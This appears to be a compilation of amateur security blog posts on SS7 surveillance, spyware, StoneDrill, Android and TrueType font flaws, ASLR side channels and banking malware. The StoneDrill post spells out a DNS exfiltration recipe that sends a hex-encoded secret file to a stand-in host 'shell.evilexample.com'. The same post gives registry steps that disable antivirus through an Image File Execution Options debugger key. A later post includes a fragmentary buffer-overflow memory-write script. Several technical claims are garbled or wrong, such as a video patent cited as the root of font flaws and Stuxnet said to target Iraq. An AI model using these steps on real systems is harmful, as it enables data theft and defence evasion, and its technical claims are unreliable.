The culprit of the CIA’s global covert hacking program given from SS7 design limitation

Headline news today provides a 2nd round of reminder to the world that we are under surveillance.  Since our hero Edward Snowden heads up to the world earlier. As a result, he such a way may carry a crime of treason. To be honest , I am a little worry about of him. The fact is that the expectation of president in united stated has been changed. Good luck to him at all! If god is present, please give your son Edward’s assistance. He really need you help!

The no. of total 8761 documents posted on wikileak we are not going to discuss here. Just know this is the first full part of the series dubbed Year Zero. However we would like to bring your attention on the weakness of tel-comm industry today. And believed that this is the root causes or you can say this is a backdoor on telecommunication world. Ok, this time all we emulate as Sherlock Holmes. Let’s start.

Speculation

  1. Flaw found in ASN.1 compiler

Abstract Syntax Notation 1 (ASN.1) background:

Quick and dirty description:

In the field of telecommunications and computer networks, ASN.1 (Abstract Syntax Notation One) is a set of standards describing data representation, encoding, transmission and decoding flexible notation. It provides a formal, unambiguous and precise rules to describe independent of the specific computer hardware object structure. ASN.1 provides application and protocol developers a high-level tool, essentially a data-definition language, for defining protocol syntax and the information that an application exchanges between systems.

Vulnerability:

A flaw discovered in an ASN.1 compiler, a widely used C/C++ development tool, could have propagated code vulnerable to heap memory corruption attacks, resulting in remote code execution.

Heap memory corruption attacks

Traditional memory corruption exploit can be achieved by pointing to the injected code on the stack or heap which data resides in.

Technical information – vulnerability details

Vulnerability Note VU#790839
Objective Systems ASN1C generates code that contains a heap overflow vulnerability, for more details, please refer to below url for reference.

https://www.kb.cert.org/vuls/id/790839

Afterwards, the government agency relies on this design weakness of SS7 to track the movements of the mobile phone user anywhere in the world. From technical point of view, compromise of WhatsApp or Telegram was not direct way. Sometimes no need to install malware to the clients mobile phone. It is exact the abuses of SS7 weaknesses.

2. TCP/IP version 4 (CVE-2016-5696)

The difficult part for hacker taking over TCP connection is to guess the source port of the client and the current sequence number. A group of researchers found that open a connection to the server and send with the source of the attacker as much “RST” handshake packets with the wrong sequence mixed with a few spoofed packets. By counting how much “challenge ACK” handshake packet get returned to the attacker side.  Attacker might knowing the rate limit one can infer how much of the spoofed packets resulted in a challenge ACK to the spoofed client and thus how many of the guesses where correct. This way can quickly narrow down which values of port and sequence are correct.

 

3. Law enforcement backdoor software overview

Edward Snowden disclosed global surveillance program in 2013. We all alert that surveillance programs are flooding all around the world. Bring to tech guy attention may more or less is the sniffing technique. How was US government collect personal data and telephone call on our desktop and mobile phone devices? Tech guy with interest on cyber securities may know few hacker group assists law enforcement sector develop monitoring agent software. The brand name includes DaVinci, Morcut, Crisis & Flosax. It looks that the most famous product is the DaVinci. An Italian made surveillance software best perform a lot of actions, such as hidden file transfers, screen capturing, keystroke logging & process injection.

Interest story happened on July 2015

A cyber-surveillance company believes a government may have been behind a massive hack of its systems that saw huge chunks of its code stolen. For more details, please refer to below URL:

http://eandt.theiet.org/news/2015/jul/hacking-team-breach.cfm

After you read  this article, you may have questions? Since 2015 data breaches incidents happened in frequent. It is hard to believe that how weakness of cyber defense setup in the world. No matter how many anti defense facilities you built in your firm. Seems there is no appropriate solution to fight against cyber crime. Do you think all the incidents happened within 2015 to 2016 are related hacker code exposed in July 2015?

Reference:

Law enforcement surveillance software technical features:

Available surveillance modules
Accessed files
Address Book
Applications used
Calendar
Contacts
Device Type
Files Accessed
Keylogging
Saved Passwords
Mouse Activity (intended to defeat virtual keyboards)
Record Calls and call data
Screenshots
Take Photographs with webcam
Record Chats
Copy Clipboard
Record Audio from Microphone
With additional Voice and silence detection to conserve space
Realtime audio surveillance (“live mic:” module is only available for Windows Mobile)
Device Position
URLs Visited
Create conference calls (with a silent 3rd party)
Infect other devices (depreciated since v. 8.4)

Suggestion to reader:

Since the world situation became more complex today no matter political and people’s livelihood. A solution will let you easy to know your mobile phone status. Are you under government surveillance program?

If you are android phone user, go to playstore download a free program names SnoopSnitch. The SnoopSnitch which can warn when certain SS7 attacks occur against a phone and can detect voyeur’s jump into your phone.

Bye!

 

 

 

 

Imaginations – a phantom command DNS queries activated Stone Drill attack in Saudi

Patrick Jane is a fictional character and the protagonist of the CBS crime drama The Mentalist, Jane is an independent consultant. It looks that sound likes you can me in Cyber world. Ha Ha.  The most interested Cyber security topics past two days is the destructive malware dubbed StoneDrill. Since the incident happened end of last year (2016). But this news allowed to expose to the world few days ago! The Famous antivirus vendor (Kaspersky Lab) analysis all the incident details and provides the detective control to the world. In our view point, all the information can research on internet. But the difficult ways is what is the infection technique on this incident. I believed that security expertise likes Kaspersky Lab and FireEye know more information but it can’t release to public.  Since we are in the discussion forum. There is no harm to become a actor in this moment. Ok, my friends. We are now Patrick Jane. Let’s to start the journey.

Shamoon 2.0 and StoneDrill background:

Shamoon 2.0 and StoneDrill are developed by different hacker groups. The finger print ( keyboard layout and the ID) found in the malware source code look likes a proof of identification. For Shamon 2.0 , Yemen language set was found  (ID: 9217 i.e.Arabic -Yemen [ar] (ar-ye)). But the StoneDrill embeds mostly Persian resource language.

Common attack target criteria:

Platform: Most likely is a Microsoft Window OS of machines.

Victim: Targeting oil and gas companies in the Middle East and also aiming towards targets in Europe, Kaspersky said.

Imaginations  – How malware fool the oil and gas company defense mechanism.

We assumed that both oil and gas company install antivirus program , Malware detector and end point content filtering (Websense and Bluecoat). But how come to let attacker implant malware to the hosts?

Hint 1:

Found PowerShell activities (Shamoon 2)

Hint 2:

Since the usage of powershell in windows OS platform is common today. Powershell looks like a accomplice.There are a lot of ways to avoid detection.

Methodology A:

DNS queries received powershell command. A unique attack called DNSMessenger uses DNS queries to carry out malicious PowerShell commands on compromised computers. The function likes RAT. This

File transfer via DNS

1. convert the file to be transferred via tshark into a hex stream.
Command - (xxd -p secret > file.hex)

2. Read each line from file.hex, and "transmit" it as a DNS query.
Command - (for b in `cat file.hex `; do dig $b.shell.evilexample.com; done)

3. On the DNS server, we can capture the messages via tcpdump or the query log.
Command - (tcdpump -w /tmp/dns -s0 port 53 and host system.example.com)

4. Extract the messages from the packet capture
Command - (tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt)

5. Reverse the hex encoding
Command: (xxd -r -p < receivedu.txt > keys.pgp)

Done. Hey man, File transfer via DNS you are done! 


Methodology B:

Disable Anti-Virus via Debugger Setting

1. Run regedit.exe
2. Go to HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
3. Create a new key (example: calc.exe)
4. Create a new string value under your exe. The name of the string value is ‘Debugger’, and the value is svchost.exe (or anything)


Seems our Patrick Jane life stop here! Ha Ha, it is interesting, right? It looks that more technique can be used today to fool the defense mechanism. As said, this is only my imagination, it is a concept. A virtual scenario replay to detect what is the possible way on this malware incident. Ok, see you!

 

Heard that Android operating not secure anymore, but it is properly not.

Android phone users widely cover up mobile phone market. We understand that no hack proof devices in the world. Even though iphone iOS before 10.2.1 is vulnerable to DoS Exec Code Overflow (CVE-2017-2370). As a Android user we are not surprise Android operation system bug.  There are 2 critical bug occurs on mediaserver and surfaceflinger. A bug was found on 2014 identify that a potential memory leak in SurfaceFlinger on Android 4.4.4. Memory leak due to not complete designed or programmed applications limitation that fail to free up memory segments when they are no longer needed. Since this is design fault (bug), as time goes by bug become a vulnerability found by security expert last month. The CVE alert that attacker is able to use a specially crafted file to cause memory corruption during media file and data processing on Android 7.0. Apart from that, media server found new vulnerability. Such vulnerability also affects the libhevc library. As far as we know, to improve device security on Android 7.0. Andriod breaks up the monolithic mediaserver process into multiple processes with permissions and capabilities restricted to only those required by each process. However a design weakness causes the vulnerability located in the function that created the native handle. When passing in well-structured numFds and numInts (such as numFds = 0xffffffff, numInts = 2) to native_handle_create, you can cause the expression “sizeof (native_handle_t) + sizeof (int) * (numFds + numInts)” Integer overflow.

Below code is a proof of  concept shown that each GraphicBuffer object contains a pointer to a native handle.

native_handle_t* native_handle_create(int numFds, int numInts)
{
native_handle_t* h = malloc(
sizeof(native_handle_t) + sizeof(int)*(numFds+numInts));//———->Integer overflow position

h->version = sizeof(native_handle_t);
h->numFds = numFds;
h->numInts = numInts;
return h;
}

For details about vulnerabilities on Android. Please refer to below url for reference.

https://source.android.com/security/bulletin/2017-02-01.html

We heard that the overall comment on Android phone is not secure any more! As a matter of fact, design fault and design limitation are the element of the result. Since no prefect product was made in the world. Even though you put more time in development and staging phase can’t avoid a design fault occurs in your product. Yes, agree, shorten the development life cycle will hits the design fault encounter in frequent way. However modern mobile phone world integrate with Multi-application and functions. Sometime a 3rd party application will integrate into your mobile phone. Thus Andriod 7 contains defense mechanism to protect memory space and Kernel environment. But what is the fact causes the operating system still vulnerable? Ok, Let go together on this journey to elaborate more techincal details in this regard.

The evolution of Android 7.0

Android 7.0 includes a variety of system and API behavior changes.

Battery and Memory
Background Optimizations
Permissions Changes
Sharing Files Between Apps
Accessibility Improvements
NDK Apps Linking to Platform Libraries
Check if your app uses private libraries
TLS/SSL Default Configuration Changes

On above feature enhancement, it looks that the improvement on new version of Android looks fine.  As said, no prefect product design in the world.  On the other way of thinking, what if we become a hacker. On above items, which part will become vulnerable or weakness let attacker compromise the phone?

Observational standpoint:

Point 1: (Sharing Files Between Apps)

Regarding to technical details written on technical documentation. For apps targeting Android 7.0, the Android framework enforces the StrictMode API policy that prohibits exposing file:// URIs outside your app. If an intent containing a file URI leaves your app, the app fails with a FileUriExposedException exception. To share files between applications, you should send a content:// URI and grant a temporary access permission on the URI. The easiest way to grant this permission is by using the FileProvider class.

Side effect of Point 1 – Hacker can make use of File Provider class feature try to dig out the mobile phone data. The easy way is embedded a malicious program script in 3rd party application.  Fool the user to click the button (accept sharing files between apps) during software installation. Since many mobile phone users are smart today, but still have many people fall down to this trap.

Point 2: (Memory)

Both the Android Runtime (ART) and Dalvik virtual machine perform routine garbage collection, this does not mean you can ignore when and where your app allocates and releases memory. Software designer need to avoid introducing memory leaks, usually caused by holding onto object references in static memory variables, and release any Reference objects at the appropriate time as defined by lifecycle callbacks.

Side effect of Point 2 – The easiest way to leak an Activity is by defining a static variable inside the class definition of the Activity and then setting it to the running instance of that Activity. If this reference is not cleared before the Activity’s lifecycle completes, the Activity will be leaked. So all depends on mobile apps developer design. It is hard to avoid memory leak. As you know, what is the defect of memory leak? Hacker relies on this error can implant malware.

Point 3: (Background Optimizations)

ART (Android run-time)

Starting with Android 5.0, Android Runtime (ART) replaces Dalvik as the default virtual machine in the system.

 

Reference: The Dalvik Virtual Machine (Dalvik VM)

The Android platform leverages the Dalvik Virtual machine (Dalvik VM) for memory, security, device, and process management. Application designer can think of the Dalvik VM as a box that provides the necessary environment for you to execute an Android application sans, and therefore not to worry about the target device (mobile phone system).

Side effect of Point 3 – ART became the default runtime. While Dalvik relies on interpretation and just-in-time compilation, ART precompiles app Dalvik bytecode into native code.  The command responsible for compiling an application into OAT is dex2oat, which can be found in /system/bindex2oat. All mobile apps will be compiled every time the device’s system is upgraded or the first time it is booted up after it is purchased. So attacker might have way to use dex2oat to generate OAT files from modified versions of installed apps or system frameworks and replace the original OAT files with them. This is the famous attack hiding behind Android Runtime. Yes, compile method sounds like jail break of the mobile phone device. Even though iPhone can’t avoid. And therefore I still believe Android security not such poor because no products on the market can say it is hackproof.

Remark: Did you heard that hacker prepare scam email lure the user to upgrade their Android phone. It is the similar case which bring with my concerns.

Reference: Critical vulnerabilities on iPhone and Android found on Feb 2017.

Apple » Iphone IOS
score Publish Date Update Date
CVE-2017-2370 9.3 DoS Exec Code Overflow 2017-02-20 2017-02-22
CVE-2017-2360 9.3 DoS Exec Code 2017-02-20 2017-02-22
Andriod OS
CVE-2017-0405 9.3 Remote code execution vulnerability in Surfaceflinger 2017 2017 Feb
CVE-2017-0406, CVE-2017-0407 9.3 Remote code execution vulnerability in Mediaserver 2017 2017 Feb

Summary:

If people tell you that a new mobile device is excellent, less vulnerabilities found. It is a perfect design. Even though he is the best at this moment. But believed that it is hard to maintain the glory in the long run. Why, because of today business on demand business strategy. If you heard that Android operating not secure anymore, but it is properly not.

 

 

Truetype font + code = fileless malware

Security services provider alert the IT world that malware might infiltrate to their infrastructure facilities. However their cyber defense mechanism looks fall into asleep. So strange? Over 140 enterprises in 40 countries affected. Dubbed that fileless or invisible cyber attack common are in three types. They are memory resident, Rootkits and Windows registry. Refer to anti-virus expert interpretation, It evades detection by reducing or eliminating the storage of any binaries on disk and instead hides its code in the registry of a compromised host. The naming convention base on above criteria. Can you still remember W32,Duqu malware? He is the descendants of Stuxnet. We all knew Stuxnet is the famous malware which responsible for causing substantial damage to Iran’s nuclear program identify in 2010.  Regarding to the technical articles, Stuxnet and W32.Duqu specification equivalent  fileless malware algorithm.  Coincidentally, the fileless malware target Windows OS . But this matter would like to bring to our attention is the infectious media. Nowadays enterprise company installed advanced cyber defense facilities.  The detective control can effectively quarantine the malicious network activities once infected device going to download the payload file. Such malware download action nearly 99% is a execution file. And therefore no difficulties on malware detector on this direct approach attack today.

Refer to analysis report, W32.Duqu make use of true type font as a infection media. The first time I heard this infection technique looks surprise me. We understand now that a true type font can contain a malware then directly exploits vulnerabilities in the Windows Kernel. The attack method was that crafted True Type Font (TTF) files, such TTF file allowed the malware to escape a user-mode sandboxed environment implemented by the Microsoft Word process and compromise the host. Since nobody else discover more details information on CVE-2011-3402 till exploration kit open the secret in Oct 2012.

Security Experts found win32k.sys truly a instigator. They dig out that Microsoft products most likely is the major target of such attack.  From logic point of view, the users coverage of Microsoft is the largest in the world. Since the objective of Stuxnet malware outbreak targets Iraq nuclear facilities Microsoft operating system workstation.  The security expert point out the design weakness of win32k.sys. Details is shown as below:

  • Windows executes true type font programs
  • Rendering bitmaps
  • Win32K operate in Kernel area (Ring 0)

Remark: A kernel-mode object database (part of win32k.sys) that marshals commands from the application to the composition engine.

As time goes by,  Google Project Zero summarizes all the details and related information.

https://googleprojectzero.blogspot.com/2015/07/one-font-vulnerability-to-rule-them-all.html

https://googleprojectzero.blogspot.com/2016/06/a-year-of-windows-kernel-font-fuzzing-1_27.html

https://googleprojectzero.blogspot.de/2016/07/a-year-of-windows-kernel-font-fuzzing-2.html

Vulnerabilities relate to win32k.sys and True type font looks like a never ending story. See below table break down list for reference.

Remark: TrueType fonts (made by Microsoft) live in your windows fonts folder.

The BLEND vulnerability (CVE-2015-0093, CVE-2015-3052)

Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service

  •  CVE-2016-3029 confirm that vulnerability allows remote attackers to bypass the ASLR protection mechanism via unspecified vectors, aka “True Type Font Parsing Information Disclosure Vulnerability.”  The ASLR (Address space layout randomization) is the major protection feature on virtual machine especially VMware. In the sense that the specify vulnerability like flooding. It now effect virtual machine environment.
  • True Type Font Parsing Elevation of Privilege Vulnerability – CVE-2016-7182. The vulnerability is in the cjComputeGLYPHSET_MSFT_GENERAL function of the Win32k.sys system module. This is the design limitation due to improper processing of crafted TrueType fonts (TTF). The vulnerability is due to improper handling of objects within memory.

 

We did analysis tones of documents of vulnerabilities on True type font (TTF) so far. May be you have question? What is the overall impact of TTF vulnerability today? Does all the vulnerabilities has been fixed? We are all on virtual machine environment. Is there any impact on virtual machines once a single VM compartment compromised?

  1. What is the overall impact of TTF vulnerability today?

It looks that true type font design limitation integrate with Graphics display mechanism on computer hardware causes never ending vulnerabilities. See below graphic state summary table, it shown that a auto flip mechanism will be apply to graphics state variable.

You can easy to find hints in below 2 statements to exploit the usage of memory design.  Security Expert (FireEye) believed that this is one of the root causes.
The graphics controller as claimed in claim 7, wherein said auto-flip mechanism comprises:
  • a bank of shift registers arranged to synchronize the video capture parameters from video capture engine and temporarily store those parameters; and
  • a control block arranged to control proper “flipping” events based on the sequence of input video capture parameters from the video capture engine registered in the shift registers, said control block comprising a Truth Table for maintaining predetermined display setting values for different auto-flip operations based on the sequence of the video capture parameters from the video capture engine and overlay control signals from the video overlay engine.

It looks that above issues are the fundamental problem of hardware display architecture. Since memory address of temporarily store memory no bounds checking. And therefore malware can make use of this vulnerability. So the impact of TTF (Ture type font) vulnerabilities are still inherent today.

2. Does all the vulnerabilities has been fixed?

Refer to above information details, it looks that it is hard to draw into conclusion today!

3. We are all on virtual machine environment. Is there any impact on virtual machines once a single VM compartment compromised?

CVE-2016-3029 confirm that vulnerability allows remote attackers to bypass the ASLR protection mechanism via unspecified vectors, aka “True Type Font Parsing Information Disclosure Vulnerability.”  The ASLR (Address space layout randomization) is the major protection feature on virtual machine especially VMware. In the sense that the specify vulnerability like flooding. It now effect virtual machine environment.

Predictions:

I strongly believed that hackers or governance enforcement team will relies on these vulnerabilities to develop different malware to satisfy their objective. Stay tune!

 

Comments:

Some test I didn’t complete yet. If you are interested of this topic, you can drill down a little bit more. The related hints might found on visual studio documents. Related hints displayed as below:

Refer to visual studio documentation, The ushort keyword indicates an integral data type that stores values according to the size and range (0 to 65,535)……….

 

 

 

 

 

 

He is great partner of virtual machine but he can kill VM simultaneously – address space layout randomization

 

 

 

The trend in IT world running into virtual world nowadays. Even though your mobile phone operation system is run on top of virtual machine. The memory resources utilization from tradition static to dynamic since virtual machine architecture founded. Security experts worries about infiltration of malware on virtual machine. A mitigation step introduce on VMware since 2014. The system designer conducted a technology alleged address space layout randomization. As a result it avoid malware implant to kernel since no living place for the malware alive (see below – a statement on technical article point out that how ASLR bring in the value)

The VMware ESXi kernel uses an address space layout randomization (ASLR) methodology to provide random and unpredictable addresses for user-mode applications, drivers, libraries and other executable components. This is a significant security benefit because of the way ASLR thwarts malware looking to take advantage of memory-based exploits. The malware would not have a known address to use as a vector for the exploit because of the randomization.

As times goes by, ASLR not even is the assistance of virtual machine designer. On the other hand, he will become a killer to kill his master. But this fact is not a news today. Regarding to the technology expertise experimental studies, it is possible to execute a attack on kernel side through malicious Java application. The method is a kind of side-channel attack (side-channel attacks) and based on the definition of indirect addresses to which had previously been handling when traversing page tables memory processor unit MMU (Memory Management Unit) in the translation of virtual memory addresses to physical memory addresses. Since cache CPU general and it is recognized as an active application or activity the MMU, then by evaluating differences in data access time before and after resetting the cache (the attack variety “EVICT + TIME”) can with high probability to choose the address and able to detect the locations since it is under the operation of memory management unit.

By breaking ASLR, an attacker will know where code executes, and prepare an attack that targets the same area of the memory, stealing sensitive information stored in the computer’s memory.

The vulnerability channel found on web browser announced by Professor of Computer Science at Cornell Tech on Jan 2016.

When attacking browsers, may be able to insert arbitrary objects into the victim’s heap. Let’s focus on web browser design fundamental.

Web applications communicate with each other through system calls to the browser kernel. As we know, web applications exist in separate processes owned by the browser kernel, they are prohibited from communicating with each other, except through the browser kernel.

 

However Plugins are less reliable than browsers.

However Plugins are less reliable than browsers

 

As a matter of fact, Java script is the helper of ASLR vulnerability. Sounds like java-script is an accomplice. The murderer is plug in application.

But in which situation virtual machine will be compromise of this vulnerability?

From technical point of view hacker engage a cyber attack targets workplace on memory area we understood that it is a malware form style attack.  As we know, AMD architecture define a feature named SVM instruction set.  AMD virtualization technology, codenamed “Pacifica,” introduces several new instructions and modifies several existing instructions to facilitate the implementation of VMM systems.
The SVM instruction set includes instructions to:

Start execution of a guest (VMRUN)
Save and restore subsets of processor state (VMSAVE,VMLOAD)
Allow guests to explicitly communicate with the VMM (VMMCALL)
Set and clear the global interrupt flag (STGI, CLGI)
Invalidate TLB entries in a specified ASID (INVLPGA)
Read and write CR8 in all processor modes
Secure init and control transfer with attestation (SKINIT)

Remark: Fundamentally, VMMs (Hypervisor) work by intercepting and emulating in a safe manner sensitive operations in the guest (such as changing the page tables, which could give a guest access to memory it is not allowed to access).

 

As such,  you are more free to run on memory address space once AMD-V is enabled in the BIOS (or by the host OS).

Remark: (VERR_SVM_ENABLED)

Below confirmed CVEs looks headaches to virtual machine core designers (VMWARE, VBOX, Hyper-V), right?

  • CVE-2017-5925 for Intel processors
  • CVE-2017-5926 for AMD processors
  • CVE-2017-5927 for ARM processors
  • CVE-2017-5928 for a timing issue affecting multiple browsers

Since founded AnC attack (EVICT+TIME), it  can detect which locations in the page table pages are accessed during a page table walk performed by the MMU.  In the sense that it such a way broken the ASLR feature on virtual machine. The objective of ASLR mainly avoid malware infection on virtual machine. What scenario we can foreseen tomorrow!

Sample: Java code with execute arbitrary memory write

// prepare buffer with address we want to write to
ptrBuf = ""
// fill buffer: length = relative ptr address - buffer start + ptr offset
while (ptrBuf.length < (0x????? - 0x9????? + 0xC)){ptrBuf += "A"}
ptrBuf += addr

// overflow buffer and overwrite the pointer value after buffer
obj.SetText(ptrBuf,0,0)

// use overwritten pointer to conduct memory write of 4 bytes
obj.SetFontName("\xbe\xba\xfe\xca") 

// WHAT TO WRITE
alert("Check after write:0x???????? + 0x?

 

 

 

 

 

Mobile Financial App inflicts more contradiction on cyber security – part 1

When you pick up your mobile phone daily, no one will be care of your data privacy in highest priority. Since you are busy with your social media apps (Whatapps, Facebook, Instagram..etc). As easy as today make a payment on air through your mobile phone. However, your habit forming behavior might cause inherent secuirty risks silently. Yes, this is not a hot news. My friend believed that his phone is secure since he installed anti-virus program. As easy as today make a payment on air through your mobile phone. However, your habit forming behavior might cause inherent secuirty risks silently. May be you feel that it is not a critical issue once anti-virus program installed. From technical point of view, it looks correct because anti-virus will monitor malicious activities and quarantine the suspicious activities.

As a general user point of view, we all trusted the mobile financial apps issued by Bank. Do you think it was enough that install a virus protection software and do the mobile patch management. It will resolve all the problems. Regarding to this question, below table can provide an overall idea in this regard. It looks that some component had their own fundamental design limitation.

Compare with traditional non visualization computer architecture, smart-phone memory resources usage brings security concerns to subject matter expert. Apart from this, MIDP (mobile information device profile) carry out trusted relationship concerns of mobile phone applications.

It looks that tons of security concerns carry out on mobile finance software application. But what is the factors let financial institution keep going to this path but don’t take a U turn?

This questions looks everybody can answer? We are living on the earth and it is a demanding atmosphere. The traditional retail banking environment can’t survival on traditional banking product. Besides, labor cost, shop rental fees are count in bankers mind. The bankers think e-business can give assistance. And therefore a electonic technology similar as flooding to change the traditional world was born.

Information security value?

A joke told us that business man did not have key term information security in their mind until tragedy happen. As times goes by, mobile banking technology become a main trend today. Even though a small shop in village from China also accept mobile payment. But what is the value of information security no one can answer today especially bankers! Because if someone put information security on top priority means the efficiency of business developement will slow down. But who have guts to carry this burden ask the management board return to twenty years ago technology?

What is the possibility or hit rate on malware infect mobile phone?

A technology term bring your own device (BYOD) means you are the owner of the device. If an cyber incident occurs on your phone, it is really a sophisticate scenario. As we know, mobile phone system architecture operate on top of virtual machine environment. For sure that the web browsing activities on your mobile phone more intensive compare to your home workstation. Since it is a mobile device, your mobile phone will able to access mobile hot spots anywhere. It increase the attack surface for hackers execute the attack.

What if your mobile phone infected by malware? Do you think it will harmful to bank system?

If you are my follower, do you remember that we had discussion on malware infection technique last year. A critical malware incident occured in U.S. weapons manufacturer Lockheed Martin Corp on 2011. Hackers infiltrated to their internal network.This incident driven Lockheed Martin develop kill chain framework. The goal of this framework is going to defense malware activities. Below table is the famous framework of Lockheed Martin Kill Chain.

Refer to above table, disrupt the malware infection process need deny in delivery phase. However the local anti-virus install on mobile phone do not have such capabilities. The mobile finance application provides flexibility to client. But it was not secure!

Under this context, can we say online banking will be secure than mobile finance apps install on mobile phone? As a matter of fact, a mobile finance applications install on mobile phone exploits programming syntax once phone compromised by hacker. It such a way assists hacker understand the finance institution back end process. Compare with online banking system, bank customers may vulnerable to man-in-the-middle causes privacy leakage. However the overall risk rating lower than mobile finance application software. At least hacker may have difficulties infiltrate to back-end system.

Cyber Crime Business Is Still Booming, especially Targeted attack trends. It is hard to tell what is the functionality on mobile finance application software in future. May become a electronic wallet. Since a design weakness has been known, who is the appropriate guy to metigate the on going strategy in future?

It is a long story, let’s discuss later!

 

 

(Banking Environment) Advanced technology – brings of concerns for cyber security!

Electronic payment one of the major term of in our daily life. It is hard to imagine that what’s the result once without credit card payment, online payment transfer and mobile payment in the world! The cyber attack hits financial institution more frequently and rapidly especially malware. In this discussion, we are going to investigate modern technology on electronic business bring the impact on financial institution in the long run.  The mainframe computer bring a secure environment to IT world since it operate on a proprietary operation system (z-OS), well defined system architecture (trusted kernel OS). You never heard that a zero-day vulnerability encounters on MainFrame OS or application weekly. As times goes by, the over demanding business activities in the world transfer the motivation equivalent push a secure technology concepts to the cliff side.

Can we say Java technology is the instigator?

The MainFrame system designer did not have hiccups of their system design since the isolation level of memory and operating system coding not as easy as jailbreak a iPhone iOS or windows OS system. However a security weakness of the system feature might bring an unforeseen tragedy to their environment.

Java for OS/390 creates java bytecodes which are not directly executable OS/390 instructions.

However a indirect way may possible lets Logical partitions (LPARs) become vulnerable.

Why?

The combination of buffer overflow and heap spraying is the most common exploitation of pdf malware. How mainframe generate pdf format of file driven by cobol programming language. FPDF is a PHP class which allows to generate PDF files with pure PHP, that is to say without using the PDFlib library. But what is the inherit potential vulnerability of Java. The Java API for JSON Processing provides portable APIs to parse, generate and transform.The COBOL application populates the CRD and passes it to the generation subroutine (RCJSNGEN) with the CRD source in a CALL statement. RCJSNGEN then converts the COBOL data to JSON objects and returns the top level JSON object to the application. Even though cobol program module not vulnerable. But 2 items of high risk application run on top of mainframe Logical partitions (LPARs).

But reminds reader that Java for OS/390 creates java bytecodes which are not directly executable OS/390 instructions. Can we say OS/390 can avoid ring zero attack absolutely?

Ok, let take a closer look of Z-OS system architecture.

 

  1. User address spaces are unique and run single applications
  • Multiple units of work can be active within the address space (parallel execution)
  • User address spaces do not communicate with each other
  • If one address space fails the other user address spaces continuous to run

2. System address spaces

  • Execute system components (elements) – DB2, CICS, SMF, DFMS. These components are call subsystems.
  • System components communicate with each other

3. Cloned or Duplicate address spaces running as a subsystem communicate with each other

  • Multiple address spaces of a subsystem and as a component act as one
  • If one address space fails, the components communicate with each other

Refer above 3 items, 3 types of memory address looks no direct communication with core OS since they are defined as a subsystem. But what is actual status of hardware DMA memory address resources sharing. For example, FICON to access local storage, network adapter (Ethernet and SDLC). And therefore it is hard to say that modernized mainframe environment as secure as classic mainframe system.

Electronic types of Bank Robbery

The Extensions for Financial Services (XFS) system accidentally driven of finance lost in banking industry. The XFS function is responsible for mapping the API (WFS…) functions to SPI (WFP…) functions, and calling the appropriate vendor-specific service providers. As a matter of fact, the Extensions for Financial Services (XFS) system causes financial lost looks serious than traditional bank robbery case. For instance ATM malware incident or 2016 Bangladesh Bank heist. The total of amount of financial lost are huge. From humanity point of view, feeling of optimism since such financial lost incidents did not injure human life. However it is more difficult to fight with technology crime compare with traditional crime.

Reference:

The Phantom of the payment (SWIFT) – A new system flaw found by Microsoft this week. Is there any relationship?

The APAC countries audience might voted “The Phantom of the Opera” is the famous opera, right? I familiar with the song, The Phantom of the Opera is there. Inside my mind. …..Yes, regarding to the subject matter, I digress.The payment flaw incidents happened this year looks didn’t have appropriate resolution to resolve. “To share attack intelligence … SWIFT first needs more hacked banks to come clean.” Brussels-based SWIFT announced the launch of the new team on July 11 as part of a customer security program unveiled by CEO in May. The program was a reaction to persistent security criticism leveled at SWIFT in the wake of the $81 million heist from Bangladesh Bank earlier this year. Read a lot of technical articles and analytic reports receive the understanding of the security weakness of the core system.  I am not going to mention too much in this area because you can easily found the related informations on internet. But the payment flaw security incident especially incident happened in Bangladesh bank.  As a matter of fact, it bring to our attention that the weakness of end user computing and IT infrastructure let this nightmare occurred. Why do we recall this system flaw again? New issued by Microsoft yesterday, a vulnerability occurs on windows OS system. Yes, we don’t surprise on zero-day weekly. However this vulnerability bring to my attention once again!  How importance of end user computing was?

Microsoft found the following:

An attacker could exploit the flaw by conducting a man-in-the-middle attack on a system or print server and injecting malicious code. That’s possible because the print spooler service doesn’t properly validate print drivers when installing a printer.

The conclusion told that rootkit or malware can relies on this way jump inside windows OS system in silent mode because the print spooler service doesn’t properly validate print drivers! It sounds horrible, right?

My personal opinion is that end user computing is the major factor in nowadays IT world regardless of which types of system. I did penetration test on SWIFTNET in 2010 and couldn’t found any critical flaw on SWIFTNET. At that time mistake to believe that modern defence mechanism can fight with insider threats. Seems the stories happened can tell.

In the meantime, I strongly believed that the weakness of system (SWIFT) not the major factor causes serious cyber security incident and fraudulent payments. The initial instigator is the end user computing. Let’s keep our eye open and see whether it is true or not.

Reference articles refer below URLs:

Swift Hack Probe Expands to Up to a Dozen Banks Beyond Bangladesh

http://www.bloomberg.com/news/articles/2016-05-26/swift-hack-probe-expands-to-up-to-dozen-banks-beyond-bangladesh

SWIFT CEO warns: Expect more hacking attacks

http://timesofindia.indiatimes.com/tech/tech-news/SWIFT-CEO-warns-Expect-more-hacking-attacks-/articleshow/52583643.cms?

Every version of Windows hit by “critical” security flaw

http://www.zdnet.com/article/every-version-of-windows-hit-by-critical-security-flaw/

ATM thieves are all in jail. Can you tell me that bank ATM environments are safe now?

A wide range of views (Advanced persistent threat)

We heard a technical terms named advanced persistent threat since 2013. An information which announced by cyber security company (kaspersky, FireEye, Symantec….etc) but not acknowledge by instigator . The story looks amazing that a security consulting firm (Mandiant) fooled by hacker. By coincidence, it found malicious finger print on gmail account and email message contained alleged resources came from China during investigation. This incident lets people in the world believe that cyber war will be happen in between country to country. A technical vocabulary so called Advanced Persistent Threat spreads around the world.

An unauthorized person gains access to a network and stays there undetected for a long period of time. Cyber security terminology so called APT attack. APT style attack confused security experts. Their mechanism contains many shadow nodes. The shadow nodes located in different areas and countries. It can take this advantage and convert as political tool. It is a sword. Careerist can blame another country that they are dishonest using internet. Who’s cast a unrighted wrong, believed that above diagram can provide an idea to you in this regard.

Reference: – Unofficial information which did not acknowledge by instigator

APT 1: cyber espionage group based in China – Discovered on Feb 2013

APT 28: Russia’s Cyber Espionage Operations – Discovered on Oct 2014

whistle blower (Snowden) – surveillance program scandal ( PRISM ) – Discover on Jan 2014

The design objective of Advanced persistent threat:

Enabled espionage using a variety of intelligence gathering techniques to access sensitive information.

Government enforcement official tools

i. Da Vinci and Galileo

Made by the Italian company Hacking Team, use to Hijack Phones for covert collection of emails, text messages, call history and address books, and they can be used to log keystrokes and obtain search history data.

